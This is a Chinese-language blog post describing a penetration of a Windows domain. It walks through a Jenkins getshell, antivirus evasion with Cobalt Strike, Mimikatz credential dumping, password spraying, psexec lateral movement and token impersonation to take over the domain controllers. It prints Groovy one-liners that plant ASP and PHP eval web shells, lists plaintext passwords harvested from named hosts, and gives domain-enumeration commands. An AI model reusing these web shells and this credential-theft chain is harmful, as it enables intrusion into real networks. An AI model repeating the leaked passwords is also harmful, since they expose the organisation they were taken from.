前几天帮朋友搞了一个域,很久没有搞域了感觉都快忘的差不多了,不过还好最终还是打穿了这个域,不过应朋友要求就不以文章形式来写了,简单的整理了下思路和测试过程中遇到的一些问题和解决方法分享给大家,希望大家能够从中有所收获!!!
关注【潇湘信安】、【Hack分享吧】公众号,一起学网络安全知识!
0x01 域渗透思路总结
1. 利用Jenkins进行打点Getshell,默认为SYSTEM权限,但是当前主机不能出网,工作组50.1;
2. 通过nettat -ano网络连接分析发现这台机器有与其他公网连接,21、443等特定端口可出网;
3. 因存在飞塔Fortinet和印度QuickHeal杀软导致MSF无法上线,流量检测,免杀CS成功上线;
4. 利用CS中的Mimikatz抓取到当前机器明文密码,通过对其分析发现可能存在通用/规律密码问题;
5. 搜集内网信息发现存在1个工作组和4个域,获取工作组和域内所有机器主机名和IP地址等信息;
6. 用50.1明文密码对存活网段进行爆破,得到9台机器权限,1台50段,1台11段,其他都是15段;
7. 对15段的两台机器进行psexec横向后发现TRANSASIA为域内机器,都存在QuickHeal杀软;
8. 域内机器一样只有特定端口可出网,但没有流量检测,可通过CS执行Mshta Payload上线MSF;
9. 在这两台域内机器做信息搜集时成功定位到域管理员用户和域控制器/DNS服务器主机名和IP地址;
10. 在域内机器15.76上利用MSF的Mimikatz只抓取到本地管理员和一些域普通用户的明文密码,尝试利用psexec、wmiexec等方式进行横向渗透打域控,结果都利用失败,因为目前只有域普通用户;
11. 不过最后我们在域内机器15.70的进程列表中发现有ssms.exe、sqlcmd.exe这两个进程,并且都是以TRANSASIA\Supertrans域管理员用户运行的,所以也就有可能会存在域管理员用户的令牌;
12. 最后使用list_tokens命令看到确实存在TRANSASIA\Supertrans域管理员用户令牌,进行模拟令牌后发现这样还不能抓取明文密码了,rev2self恢复原始令牌后直接利用Mimikatz抓取到TRANSASIA\Supertrans域管理员用户的明文密码,成功拿到15.14和15.18两台域控权限;
13. 在域内机器15.76域普通用户的明文密码中发现存在规律密码,可结合工作组50.1中的通用密码Delldc#!@#和FileZilla等密码信息生成高精准字典对其他存活网段进行爆破测试。由于其他几个域内机器并不多,所以也就到处结束了吧,不再去测试其他网段和域了,拜拜!
Jenkins Getshell:
println "whoami".execute().text
println "cmd /c echo \"<%eval request(\"sf\")%>\\\" > C:\\inetpub\\wwwroot\\test.asp".execute().text
new File("/var/www/html/shell.php").write('<?php @eval($_POST[cmd]);?>');
0x02 密码的搜集整理
192.168.50.1:
Delldc#!@#、Ftp@123、FtP!0T$!23、pavankumar@1、India@1223、India@123、Admin@123
192.168.15.76:
tbm@12345、tbm#1234、vennela#789142536、tbm#12345、tbm!1234、Nov@2020、Tbm@1234、plm@1973、tbm#123456、edc@1234
0x03 常用域渗透命令
ipconfig /all //查询DNS服务器
net user /domain //查询域用户
net group /domain //查询域里面的工作组
net group "domain admins" /domain //查询域管理员用户组
net localgroup administrators /domain //登录本机的域管理员
net group "domain controllers" /domain //查看域控制器(如果有多台)
nslookup -type=SRV _ldap._tcp //查看域控主机名和IP地址
net time /domain //通常域时间服务器为主域控制器
wmic ntdomain list brief //搜索计算机域控制器